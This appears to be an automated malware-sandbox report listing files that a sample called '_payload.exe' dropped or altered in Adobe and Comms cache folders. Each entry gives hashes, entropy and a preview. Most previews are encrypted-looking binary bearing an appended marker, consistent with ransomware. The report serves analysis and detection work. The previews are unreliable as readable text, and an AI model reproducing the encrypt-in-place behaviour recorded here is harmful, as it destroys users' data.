                                                                                                      Preview:2023/.....D.\A.3.R.$..@..8.}...........A#1Vv.!p&.D<.lm^../.=..eD...>C..*.;...h.j,......V.TR&`9..U"....U...0.?d..}e....).0.!..t...|...k..B.. .R,.JnF86.....i.>..|.j*9.......CvyX....n.U6.!?).W....P...j.2F8Gp..h[.B......9....e]..=)U.=..S!r...%Dhj4.="....^`......p_.0...\zQ.}.... .. .U..;S....w.....x.....H{......9.....px.*...d.0B.._.......m..q/..C..a....xf%......5o.[......b......)c8.....u.H.c..s....{.1.Y....MV.C.....!.l...@...o;...\..........`L..E.....d.....$..Vx..N...'.l&.bbL..y..E-)uZPT......!i.b.dD.....S.....|AhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):818
                                                                                                      Entropy (8bit):7.738114976462255
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YKW/bAtBc8Eji0sjgEZpghNYjD9z+SwsKJ1v6bD:YpSEji0sMEQhNYjF+Swp1wD
                                                                                                      MD5:B11B41CAD85151C5C51FF3A916A000D7
                                                                                                      SHA1:30D3136E68BEABE1C7E0F3988C76831C46F20D6A
                                                                                                      SHA-256:57FE28AAED5D0BD220EC29E2DFE9D895F6B7E86933A487EA11F36676AFB07BFD
                                                                                                      SHA-512:813867D9ED6E19321D363F38B6DCE0B127BE7B14A597FF8A21E170C0E18BE26340B95E5830DFF2C3B3630C8D36B43AEC4B188CF2648980533A353BC3A89E0F0A
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:{"os_.J.D..<(.T.#....==.'....<6.~..c.T.s..J.y.E.\_h.a.C...".8J...u..U..bG:..M \...,.f....vW....F.##..NZg...)a.z.........E....;f*.Wn.bDl....@...z.}....}%...k.......Q..p8..2.K..E.H:....&.*.F5....Zj6GF......FfN.0..M..r......D...>..I.....4./...l./.r..:..Jt.8.~../J.d,U]Q.*4:.sO{..W..I.}......mD...r..zG..L..A...qi.....p%.Ig..?m@.B......O...%.'....p8R..v[....Hy.hF@...w.:bp.wA..ed.f.c..C..3.S?.x.....pG...4.^Z>e.....D&5fH*.".U...r.*.|w.._..O.P.H.:dK.?(N.Gy.......`..S.=.u?... ...PCY..RJQ.....2.hl....(.A...lm.....#.\.L.%H......W.#Z..o..-......\>c..s...='...r8........h..LU.|..>.....3..l..83T.7.mY..OK.i..3.l....U.B...0..].B....z:..[.#.O...5.bt3dm....L.g....g.Z&...}z...K;.....B.....x.8$..D..1T..^{.(...5..].r.eC...).hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PostScript document text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1567
                                                                                                      Entropy (8bit):7.876941381570979
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:8AzhZKoAV9BhmYUuH/akpGl/pybED1awD:XXsV9BkQY4bW1P
                                                                                                      MD5:AA94B48CEA589E16CFA7F58A162C7049
                                                                                                      SHA1:664021F9FCD3EC0AB6281A557BDFC50DE57D308D
                                                                                                      SHA-256:BEB9181DBE5A8AA2BA7814E42D20C7F9B433EE94AFC2348D8C67A4F12DA246CB
                                                                                                      SHA-512:9B956FDA7598E36DE2C4798A906D86B29BA93349DDDD755C8A54BBBAFCD28C052BE624FAB8256B8627A73502A76315AEF49876E4C8D31D3DA10D36E3A59F234A
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:%!AdoP..fy6..[.l.......$c.....z...........2.h.>..nW..*..=.L.2.o)..38Q.8.:..CXo.L[.P....W...d..>.H.?....J.m......^"..paM.....,...yx..jE...@......E...'..m..N.?M..o........1.....M.......y.S...........VXJ. =..~:7%......L%.8...*..h7.6.R.s.]i.]....4c.0...d...[.M......$..H.#.dh.T...~..F{fI.....7..K..LZ.}.]Pj.)......L....*......:...wA..n... ...F.....8.(u..9|.lJ...:.G."*6.E..r..s..8....Q.....lm.8..7.]..pU...eP..O. .?+...@..z..j..cC.P.{._=.U.~........qq.....W....J<.h.Z.3..K.Cx'.....j`.T..*..{.[.x#.-Wbn.>D..I~*...F.(.R..a.!....NP...QG.X..7.....z^..lpN...#.M..W....|W......iU..W.%O!vU...n.$....hn....Z!^8...d...6....!J..g2...8W .Y.Nba..v+..sW....nf3..R-.:.,...).....p..w.lzt..s...?o.'..?Bj8..<K&.m..c...#'2.eK..;.{.......i9.+.R=#...e..v.....M...o.....NX..>df.<.g-c..<.B%.Q.......0...G]..<...t.N;n.........eW}..-N'..4m3..W.".J.N..-....V.L..8*.#...p......X.t...Vt.c.C.Y.C..._......E.....*.?.#/...Y.<I.B]..j..p....Q.a.i....i.L.2.+.lZ...\.CG.".@l.

                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PostScript document text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):185433
                                                                                                      Entropy (8bit):7.87502217214286
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:RkJ8jK45PIXmZK7OfdedUoSalwx62Jf8ckh67e03nef+vwQ89IvIW/EXE07Zman9:ko5PIXqldea/kwx62FahKe5Q89yDEXE6
                                                                                                      MD5:E71EA89DCB65B595C721B1884CEB26E5
                                                                                                      SHA1:A5FF98F7B59C6994E36D5EB47CDEF083D87506D3
                                                                                                      SHA-256:71CD8ED70DE88B253433859F0DADF48C07FAE111597CE7CEE8D3B133D707453B
                                                                                                      SHA-512:62B81140EA2023D5BB9B7EBD69AF45A33EE86E666D4A079D2BB0EA9BE97DA920ED032D34AACB7539820925E48C1EB446FA12C71D636B6BC1C7F56F6E67B56A75
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:%!Ado..f..,..Q...._.`....O11...6..........3.....Hj.."T..4.Ey|b..Hc...5....,..h/.......l.V..rVu........&.>......!..3E.7...!V9..{Fi..@..Q.3.zw|.r.<.j...Z....(_*.k....f.v.LFrp......K?w`Tu...Zhd.....s?...I<.\pe..#.\.....H......#..)....!eA ......k.ew....>.yD._.....Z$m.t..).M~<Yuu...D.fn...Di.Q.F.'.{T...^.]...Q9.$.4.V.y.}GI..\....F.[...3U...DN7..j.xS..|].c...ZF&kt...l...........]..9>u~. .e.....Q.(.c..m.......D`.?.G.....%..zWB ...Mwl......?C.]\V.}sd.. .2.D..s...^GsNk..f.J.0...sC..?O.>..D..^.Z....yj..s|.....%...1....A..T.].$..i.`....rE.:.X`.s.=....;/.3..x..........:G.x...r.........1..0.8g...#...n(...M<.....Z..t.&.Zx.5.l.d.....|.x.s...CB....S,2.v%.~..%.h.VJh.+......'P..0.8.:.!.YV.{:.wq..?...4.>..s..Hp.. ;uJ.\.e*0.Vw....>.....}.~N/P...s.T}.0f....)J..Q......0o%.J..".....`...Cx......._....I..l....g.-...v..x..s.f..*.}.....0....39.b........NG.....N......N..c..(..^.X.....w*.B..l=.(........fc...g.s}.".&p..{a..\....n.l.3..<UUg.o.v.t.i.['.

                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):243530
                                                                                                      Entropy (8bit):6.819366919246551
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:ED7tNuX2/y2zYrD7n2LpgF9NGYLFGGhEvyHNan1TMiJ5BFOolNln8:ELuX76YX7nU6coFmCaPPNn8
                                                                                                      MD5:90ECC6EA965A5578E31D62228AAC6496
                                                                                                      SHA1:2154E84DF7FA0E15E79358D85FE881ADCE0AACAC
                                                                                                      SHA-256:AB36FCCCFD2610F025478AE617A168FA39AFA49C49B7C1D7E0E3F646A56209DE
                                                                                                      SHA-512:4BD7AE83CB3E3694D8042A95355C8C17AB41C3DD43C705DA626902D19D77A5F866C1850601A3E25D7EA099EEE2EE73F1FE054B0BCF4C754DDD73825985CF0AA7
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:Adobe....~.....P.H..'$..f...n..HW...D....as<....#...xS...M...p.t1._......Z.-/....~3.*..[..m...aq.ZqV.L......W)0|.j;...\...m5.p.mN.6.'.`;R.,..~G.f.xi..'i.z.;.R...dv6...]!.......s@..g....P*/.C...Q.e.D.". ..u....._l..p.......H ..Q7]..)..l"x....B.?......YQ&.s.3.G.4.I..*..._..<@,.t#$..^'..g...y....N....z...a.....a.3%....2.>..R..B'Lk-oj....Ds..msz+.....,-;.....61.D..T1..$.,.^..\....6.K..G...]4.!hX...F.8l.-n.V.....>.......b....).IP-W}.K.$.M..i.b...m....e>.u..d.y.....Q..f{.bb..?....).l.in..m..y..zT.4......v.x..wm..mK........j6.#.~.m..~..5_.6.P.'\..C.(.=.E.>.t...op.,V.....?....^.~. .x%_SU].j..^.A .WAB...6.f.....UP.+&.`..i.'NCrd.....-....>..q%.....iD.."....Mk.r..G..8......zP..u.A..J.yu.a....|G.*bw..(..<.b..F..k..KP.o..#e.'7.......|.Dy.}..\O..V.xh.}..e.=........|...UY.8...8..5.....\`_.w~.U.y[j..9;..SF/TqW..S.._C..`............V..;..."s3T....q..I.m.j...K(~|.{....>~wM..s.1.a.p.Q..._ >.?...._Bi..!....-..&..SJ...E.T$...s.....F?V.%......*....r.QGH..-...2.lr

                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3152
                                                                                                      Entropy (8bit):7.941389036968238
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:dnLFlEagyaxp4hA03dk6Vq1CWJltMLjcWXT5/T8Hs:dINFp2I1fqcWjyHs
                                                                                                      MD5:B5979B316D84D95DD8FA7116A0D0F831
                                                                                                      SHA1:248E4B50FDA59D9ABE44044D4FCADE3453864438
                                                                                                      SHA-256:42A6D0971E8C7624F2C1C4540A9CA18D1451E421C57632461DE3432540030FEC
                                                                                                      SHA-512:1C22BEA6D35768F8999230ED6F83D43FA28081B25F892BE34963DAD6F26362B85C21B573FA048B3CFA0265E8A57BCA5539C2051821B281BB382F45DCBAFA9CE6
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:{"allk..."~m!..}.w..'.)..k..l^P.t..QH..../r.-.?...F...F..r.'.X.....W/.q.b.......E..6y...M .(......".9xc5%..\../p.>X..`..>.`.$...!.F..W..N\C`..c.... ..;W.4..g...U.{#..{J>t(n"....T..i.Ee."M.......z..E*.......j.)..`.-....Yj*..z..5..).....:..e..f0v..8ea1..........t.....lF*o..f...D@.C...I..TF.....|.\-....]...4(m...mw.Q.AMX.o.x`..F....d.y,(..4z...J..iJ........~..e[.p.J.=F.M....FU.;..55...].>E......R..(.?.oqT.&T...Md..]oV.!....dq..JxM..w.R..>.{.}.......r}`..$.\..0.$fl.n.n.{..K..].S.H.:f.v..+..........W..O.......ur.|%.G{....3)..j:s.(..+.;CC4F....+....*".....1.....z3+...E..v.:......`_a.j.7..+c.....n.._."T ..*.<.^..Yq`.L..7..z9&.^....&...L.....?. ...l7../..?~.2|-E..E....C...q..).cH.er...J..Y#. ..PG.....Bn.....4:..K5.u`...pK@.9....d.Ba.{J(.....3].@.D.QH.E...`...e......b........;......S.8rY;.|.:\i..K#....O..j..Rd.,Z);.A..A.....q.~9k%<..h/_.+0..U......>.\c.rc..............o....i....4........I..%.........p...Q....E...?...Q.c......QO.t...5.T..

                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):67060
                                                                                                      Entropy (8bit):7.997415835854293
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:fn3i+K3m+WQuZlWvnHV4bGxasGw0nTMFYNdu8l2dUsaOWB0l:fy+KNuqvGCzwYgcnaOWB0l
                                                                                                      MD5:A6D8EBFC5E6EF0AE60470F22BFA75CF2
                                                                                                      SHA1:8B01616B8B68A77219540E3C53654EC44B6F1D88
                                                                                                      SHA-256:20A22F5EC21F3920D41C53BC4CF7DB26C45F7568E262FE86D3920F5486A7521E
                                                                                                      SHA-512:642F41E087B6CEA1432C22BEFA7766B72E5FDFFD8ED9C7A84728C61CC5D73E5C3FAC01E639EB9D06B7F8AFE0745E7C6C556B0BDD9DC12FA9FB3F0C7F131BF480
                                                                                                      Malicious:true
                                                                                                      Reputation:low
                                                                                                      Preview:4.397BrwO5.......{....s..e...Vf..R.U..~..G..`..:3....K.....+.vB....>..i..... ,H..>!:..K..h...DMd.6.....4%..g..8.\/..}..PX.....#.......B.Z..Y........}.....L..p...r....^.Ex..(J..O.T~..l$......<HSG4dk..g.J..}#..Al^..^..F.z....h.M......)x|......zGb...\.8...5......|_f.|.]b..[h...5..{..7.u....?sk5........i......SR.y.......b.......K..u......>D........e8wI...?OPM...A..2v..<.P'}..V.L.2...Zb.e..y.k.ql...e.~y.Z..(.....sb..^....p..r>"..#.I:Gx....6j...o..D...*E^d.'.i-e.E4..W..ZgU..z`6.PB.w....K4..a.+.p.,O.....a=.6."{o...d.G.D.N.!.E.A.|....O%..`..a.tqo.'....j.(v|....L.".$g.c.A...0XL..v{..o.$*.....A...#.6..1I.T....n........%...`...v^..0'...k1.nqZ\)f..*3...A..?=W.....c...'........H.N.....viF...qB]..`.=.'#5..f......!..y4......D.\........Q.^..f.g..v.....Z...JI.01...j.q......l.dfB}9X.p..MPz..X..?!....#../5a.........Kj!...aE=x..:.=4.z&.~...&.)....G..;?.U.3.....`.L..&.A.;.-n.X...%k.gz)..}B..ZeL#........K..=..K.o...V.6...!oV.p ..c.*.....Nh...~...@.@F..

                                                                                                      C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):932
                                                                                                      Entropy (8bit):7.739301135890954
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5tDwpZar4M2dyyzKnui8xSAnlohxAEGFBv6bD:5tvr4Mieui8xSmIGbwD
                                                                                                      MD5:0FB5CAC69C3046AF5C79EE591E62C1A7
                                                                                                      SHA1:AEF9EA9D71F6B3BF791723590D02251E47502AB4
                                                                                                      SHA-256:62B2836FC006BE511762CF303AFCBB0FE1CC85C791425366572B58B83D3D9C41
                                                                                                      SHA-512:BAF4C05CE87A9E8E03A1463967134CFC15E69DD89646F2DCDD5BB7973246893455EA256FC65955557F1DAB42A26AADB5FB52912E02034475AD97708F6942802C
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:CPSA......r....m#Tn1.wL..w...7=..c....~l"...8P.A..i..D.Li$.7....\t...Rc.D.8..6.z.........Wb.D....cw.!.pu.,...Q......#!~...;..Dw.;..c..b_..o..s.zk6F.!..I.c.y,..jW.i....Y\..~.FB.G.."'q1H.h#.O:W.o,.'....bF.D......b..........cE... s.ETO.P....o...+.c.Yc.'.~_...OH.9.*.%.V.G$..%._.Bi.....So.P]{...#*...ico..7....".......Y%..M..v...q.:...Z.....k...J.xd.>.Z<.....jE.^o...E..c.,.*&/$.....S.b..b!.i$.....W...Lp..Qg.m.K..e/#..t.XZ..b.%)BLv...K...C...m...C.....%....YO.....~..U.....Y.p.t..A...%.k.%..3..D..RE..9.L6 .d..W.....c.....Z..V".wbd.M7-.b.Zvk...._..x..........+.g3!.D....jbOI.........\u....p....._M...}..\..yv....|l.u1be4..a.}'..T........p.5{.......W.c........+.j...VD..X!...H......j....o.m...y..7x...j..z...*........$....y/|x..4Y.^B&}o.6^1...Q:.X.....;.a. ..W...#.b{k.).R\..8.#!.5....^.....:...9....._...."...|....%PhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.978193943533357
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ddVBVVawwudU4bZRvunQKIdjwngZKgrxgr:dFVVbNbZRvunQKGWgKgtgr
                                                                                                      MD5:E0E7F7E6016E518A724534B027766641
                                                                                                      SHA1:F6724D9C4875D4E2B1C4D1BACAE9718BF7D57265
                                                                                                      SHA-256:D71262A320CC4E3D8C1C3E22A522B089685DB0DBFAB203C5CF9359E3F5DDE90B
                                                                                                      SHA-512:454ADA1AE555BC718FD403144631423CE908F06F361B51CD39781CFBD0C6D3EB78BA381A12EC9722A151A2F3A135B3AC8F15F8A34C89DF000121CDDF72CB447C
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:.M.#....>..[..*...lO..}...BI..)W...T&......q.v.".CR....&b0.....6....Bs|...p...U..~...B.. .....Z...A*.8.r.I..Z&K..l.G.d..ed.]...r.hQx......._>..X...Xf..f3...f..m..u......,.A..1H.Z.@.6Z=.-..h.F'0..].......9bk-2+.bqbgI...M...L.r...mz.,.A..g89.......*,j.qN..R..F|...+.K.z.p.....[./...O..u....{F.on.0.t..)...%<..C.ML|.&X`.}.o...J..N....G?e.........?.._O..`Hi.U.u.6"].3.h...9."..9.mr... ...\w2"......3S:3_...U...NX..&.2.^.t...u.N`.1w:Z.|..g..PZ!....zw.....|...A.Yr....H`....v3.ru...tKV..a..j6..<.....7J.a.....e.....p.E.....jD.3......J ..t.......h.C.2Y...._.+.....[.........b#.lA.....Y$ul..4..r.y..y9..J }hn..0.Yz.g.Oz...U.-jk.e. .0...."......:.c8E"0..A"U...|p.x..B.o<`..>....b....Ev..CT<...RFM..W...YD...l.I&...M.#....\I.Nd..6\......]........(.x.O....R.n.Y...av......^.)...WF.....n..t...r4S......U.+j8!.i.........D....mb\.....f.K..K."A.......\.amD.c..^E...0.......|9..%.mT..v.a| .r....FE8aA....B1...$.e...xk...P ..I..or\..`.;..6.!,. .D.kD.IJ(.A...>EjcR^.h.

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):1.7334840268827456
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:bmen8QVrjrZeetXVCxfUIMio3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXZAcbBg:Se8cngetFCCnyfCdYS9
                                                                                                      MD5:DDB568A696C45A22E8309387A77A2F13
                                                                                                      SHA1:A3BAECB811798D19767F00A74B3F3899A035660E
                                                                                                      SHA-256:5B2E34E45DE8248C2B4A9832EA07C5BD6EEE61C577A1576F736DEE8D8BBE58FA
                                                                                                      SHA-512:2592F0C7E9AB99D6DD9A9D21660248CE2602F696412DEB0604183421CC64D88AECEFB4CB560241FEA47427656A242CB93E9B897BD6DBFF50F7B09C64DCD9C307
                                                                                                      Malicious:false
                                                                                                      Preview:...?.-..By.......LP..s.....#.%.....%.<.D.....C...68.f8aGz..SIp....M..6.XSa..S..z..\5.e.(evf....1)....2A..{.....vE.%...{7J]..u=.ykD@..LF*&e....Bb{LG7bg"..}M|Ij.B..tM.|g...3cs......@V...[.j#.n.....TV.e.;`x.H.M..)..?.H......(htLk.#7`.G........=..W........+.^Fo......a..c...6.)j....<n..z..QfSL.gH...\/.$VVId.2%..... .....).......MP.v=.%.......A$9~&IW...D..6.Q..d.j.l;...'UQ.1E....P.....$....2UA0O.k.4.0I.L.A...3.W.]n<I.0....Y.N.....{..X....0m.Z.[.a..v.s..+..6e..N....{2....rJ........D.....r.*.^G...91...2...68....p>L.....Z.....C........8o^.9.og.|.z.IwO.|.jG......p..'.%%Bz.,N.c....>...=p3S..\..4r....h.b'......Q`.o..{.'>4MzK....T<..(iu.6.....t....o.,g..........tg.A.A.".;..F,..M. n...k......C[..X.m3U..:........DfEJV.I-.S.....G.V..B"......D..w}.a...o....6..R.!......z...................h..3...;.wkq....WqT....m...L..} ....)2......JM..1.......4..1....;`......T. +...[.).9.i.K..)....R$L..W?..N..>...'.e..XU..d..j^.BpJ.c...)2..<@...............i...>..

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):0.6706240792439269
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:NWdfRuyliwysqhyRX3ilrMYByw83rmx8SzE6NQMRBKUBcbzxvRKh:WJuw5BXgrM4i3q5Q6NbzKUB+VvRq
                                                                                                      MD5:1ED2491D668A7D0A8DCFF80845E12D14
                                                                                                      SHA1:71C5E3C05EAF6CA7F8D3B40A9066DD3EF3EEFD10
                                                                                                      SHA-256:2ABEF66358F19CAFDF70F75268BEE3B44822928A461601D4066D6811B3F5CD31
                                                                                                      SHA-512:80D783B45535135E1A1AE7CF977CB166811E261E9680067E87C6B15F4D779723A5DB8E2F6A54DE77CEAF83F1CAC7892935A572DECD5DCE0D2ADCEC80D7C7C307
                                                                                                      Malicious:false
                                                                                                      Preview:.....tat..8.....7.H.24.9..+.F..Gr....7.P+....)5N....A..{.:8...p.{..I./....M.T,....1......(.|.....k..U7y.wQxB......GI...Uu}..T...# .\...nw...._..^p.u.......[^....l@..*....[.;..Ox.L.+..l..J8+.9........>..`..v.1.(a?.S.p..bx.cu.P...._....HU^@)X.0.<.......c.._r.[ey.....T.h..>.l^4...A.....@)#..$.... .l.{.I$..".<.....AK.J.V........]1.".+c|f.....XB.J..P.U.UJ.0*Hu.8._,a..~...........P(...CLU;a...k.F. .Y......vv.@..hE...%..7...NO..[.=...s{.O(.="W........Sq<PF........l..r.YV.5...?.-{.1.'...O....R..+.%.i./.VC!.G.3`..XL.f.3..f..Y..9....Q...?...g.7.!..2.?..k!.e...c...\.{@.RQ.%..2.O...z.h.......'.%.b2).!7.p......v..S.....8...mLw.;.Q|*...s..{&....r.0.[. 'a/........O. ...n....\V.d....e.C........5.\.@....)..;.B..y.........y..{..>...X...N...>...?.......d..}.r..+..|.N.>.B.....x&...p.U......[.Z.....D.%.uw;.X.{.k..1-......G..H...].m2a....D......p.....e..'.zI...,.{.....i......CSVji..Z....;6..e.oxPTE:#.z.NY#.[...........!.qA.l.1..w.~.WU.F....k.)..D.+n.....O...R.q.

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):0.6707000431648776
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:cRo0wbwHg/euDJygUMc0VNHaVVOY4e1/Tg7ys9kEXS3U9ddvHV4toXAj38:cRPMRDkPEN6VVtJNDDEC3GDl1
                                                                                                      MD5:AE6BF6F604BC02F88CD2B620E493417E
                                                                                                      SHA1:13BC29BCF7E74B6FEAA6B3D7381B75C72279309B
                                                                                                      SHA-256:8FE1C16CCEE3B7FFA2AB647C153875533D6A7D68F42E12171B7F11E3CE60A9E7
                                                                                                      SHA-512:A30BD56CA2069C016ACD1CB19F47DB15987B0DFF2DA6C69E8F078F21CEBE029908B7AA9EEC891DB84B199819A2778C1E61C25A51A1805A07FC401EC7F9B0C4C8
                                                                                                      Malicious:false
                                                                                                      Preview:.........&F...,..........!~..=...4....m...x..n...Ec.....or6.h?.(.X....L...%..eZ92...z};o..z..-..)...Y?...2=.....Q.1..q.-..v...m.W<"W.#tH.^>%.........w...k...$....!...u..5%...B3p...K.u.s..;...|.!.H..|fD..B..'...X...{U..%C...v.......5j...].X..S..9..1.#p...yS...T....9v.....;..M.ZB.h..L.4<..D....Z%.k,v.$c...#.t.f3Nc..j......t...B.....8.~.G..*..M...3....",...M:..63.yp.F.1..:.u~....V...*.,...H.v./H..R>.2.B.^d.&sX#...m..k&..A..%....6.\y?6.nW$=.!.8.:.jz.....?.......FK.-........r...IyJ9..X^..........(.Os.c........Xh.&|G....K...D#[...HM.:_.*.7.....wr....`..S...L..o.i/...5..4..7.<...y;v.0....}.P....G@.......W*.]...NJ.?(..b`..9..F.%...pE..........Y....f..v...W....Q.y....+..>.-.... ..$..M.2.yZ.H...OoB........&.f.p.G^V..k.A.>...i7.y.KiIt..G.?....N!W\.....c\.P..cr.;....!S.."...\...3..I.y"2..Y.X.X.D...I.@..a.S.....4Qu.X..#.,.CQ.../\....xKU..j.E..B.4...0...JtA.r......v..l.W+.[-...G.U@... M"...i'6b".......cVP.qe.....H~.......j6..[..........0....hB..r.6.`

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):0.6706082601705625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:i7+e4b4gtSzLH0sD6tROnoF/ioEUvK5WVYsRsglk+r/Nyu+q6RHFbnG2k2rv:KuS4HOnkaLQLH1rNIJFrXT
                                                                                                      MD5:DBC519DA6DEA2BB8D7B43DC904D333B0
                                                                                                      SHA1:8F66161E15F41138D71685721144F71D18FB64AE
                                                                                                      SHA-256:379EB11CC060DFB19393CEC6BDEBA2539D397CF5D2C9DE71A68AAAC0BEB6B382
                                                                                                      SHA-512:BAE0702A9D3CAB453EE72C900920E5DA06FB5310C044107CA28FB688140F41888B7ACBD8315DDBF9889AC707E3119200013B2D524A2292DBD2B426383BE11541
                                                                                                      Malicious:false
                                                                                                      Preview:.....dg"?AkA.#r......j../..+....!.....0G.....d0....L}....1...9.S."..,)j\...........".}.#..Y.='R;.3D.3........7......d1...1.g...@....../..\..f..f..M.......tU..e.m...Q.r..........0~7.X[.l?U.)pC...<....Y#...r.#.....Z.u...|...]..h..jL...B{.........8..2.|..r.t..b.8H9Z0.........M_U.....".Wj..^.Y.%...a..,-.v.Ww.[..v..]t.).&.A...w.qm..>.$jz...e..W\.X.P../5:v.UP.l....K..........&....a.....c..l.|...C>.....~&..VX,8.+...>U....HO.A.w.....V.......f.....l..4)O^o,.......-@.;~...Y...'.O...!)M."9.Q.#...r..|.....f.2..A.]'..e.;...+..J....$\&....i.n..~..'..`g..LK.0Xpz..........(;.9..`....(;i...l.<.r./`......I..].}(i. ..9......RD.5...Q.r*.E...eb.Q-..^,Kjf.l.%.=.}.5.\8...&..&.s.....@.h...Q....F.B.)..aN..9.`.n.2 ... .5......Qi..fl.%>S.....0G.e....\4..zK.,.u...b....c.e.F.^...!rS.6]..i..6.O7.23.O.W....1.>....p..R....X.3.B../.+..3n)..@.0qna....$M......?...:.v.Z.=G~@..C........gRJ.`&hR.'@".7/...O.x.l...".j..>.......\I...e..%...j......9m.nDvo...i..0a.....]..+.",.....e

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.98875823475148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:ljsivoY/0AD8te5YetUJ13Ql7/d+oCsxsjdPz4YzIA:xvoYcAACEJ1GnCj9z44h
                                                                                                      MD5:39C20448F5BFD0B0A21C82BF46E62A56
